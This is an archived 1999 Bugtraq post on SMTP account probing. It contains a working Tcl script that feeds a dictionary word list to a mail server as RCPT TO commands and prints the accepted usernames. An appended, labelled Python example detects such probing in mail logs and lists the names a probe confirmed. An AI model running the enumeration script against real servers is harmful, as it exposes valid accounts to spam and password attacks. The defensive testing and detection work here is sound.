Bugtraq mailing list archives
Re: SMTP server account probing
From: dgale () DATAPEX COM (David Gale)
Date: Tue, 9 Mar 1999 13:14:06 -0500
On Mon, 8 Mar 1999, Brett Glass wrote:
> Several ISPs throughout the Net are reporting an attack described at http://www.l8r.com/nwa/nwa1.htm
Using /usr/dict/words on my Linux box and the Tcl code below, I ran this
attack against a sendmail (8.9.2) mailserver which uses virtual user
tables and a lengthy aliases database.
The result was the load went up slightly and log entries consumed some
disk space. All in all, minimal threat to service. I would not call this a
DoS attack in our configuration.
#!/usr/bin/tclsh
set infile [open /usr/dict/words r]
set sock [socket someserver.example.com 25]
puts $sock "HELO remotehost.example.com"
puts $sock "MAIL FROM: user () example com"
while {[eof $infile] != 1} {
    gets $infile input
    puts $sock "RCPT TO: $input"
    flush $sock
    gets $sock output
    if {[string range $output 0 2] != "550"} {
        puts "Valid Username! $input"
    }
}
close $sock
exit
DG.
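
Added example, not part of the original post and not sendmail code: a log check for the pattern the test above produces, many 550 replies to one relay in a short span, which also lists the recipients that relay had accepted. The key=value log layout, addresses, names and thresholds are constructed assumptions, not sendmail's own syslog format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in a simplified key=value layout (an assumption,
# not sendmail's own syslog format). 192.0.2.10 walks a word list;
# 198.51.100.7 is an ordinary sender with one mistyped recipient.
SAMPLE_LOG = """\
1999-03-09T13:14:01 relay=192.0.2.10 rcpt=aardvark reply=550
1999-03-09T13:14:01 relay=192.0.2.10 rcpt=abacus reply=550
1999-03-09T13:14:02 relay=198.51.100.7 rcpt=jsmith reply=250
1999-03-09T13:14:02 relay=192.0.2.10 rcpt=abbot reply=250
1999-03-09T13:14:03 relay=192.0.2.10 rcpt=abdomen reply=550
1999-03-09T13:14:03 relay=192.0.2.10 rcpt=abel reply=550
1999-03-09T13:14:04 relay=192.0.2.10 rcpt=able reply=550
1999-03-09T13:20:00 relay=198.51.100.7 rcpt=jsmiht reply=550
"""

LINE_RE = re.compile(r"^(\S+) relay=(\S+) rcpt=(\S+) reply=(\d{3})$")

def find_probers(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {relay: [accepted recipients]} for relays that drew at least
    `threshold` 550 replies inside any span of length `window`."""
    rejects = defaultdict(deque)    # relay -> timestamps of recent 550s
    accepted = defaultdict(list)    # relay -> recipients answered 2xx
    flagged = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                # ignore lines in any other layout
        ts, relay, rcpt, reply = m.groups()
        when = datetime.fromisoformat(ts)
        if reply == "550":
            q = rejects[relay]
            q.append(when)
            while when - q[0] > window:   # drop rejections older than window
                q.popleft()
            if len(q) >= threshold:
                flagged.add(relay)
        elif reply.startswith("2"):
            accepted[relay].append(rcpt)
    # Recipients accepted from a flagged relay are the account names the
    # probe confirmed; those are the ones to watch for follow-on abuse.
    return {relay: accepted[relay] for relay in sorted(flagged)}

if __name__ == "__main__":
    for relay, names in find_probers(SAMPLE_LOG).items():
        print(f"{relay}: probing suspected, confirmed names: {names}")
```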
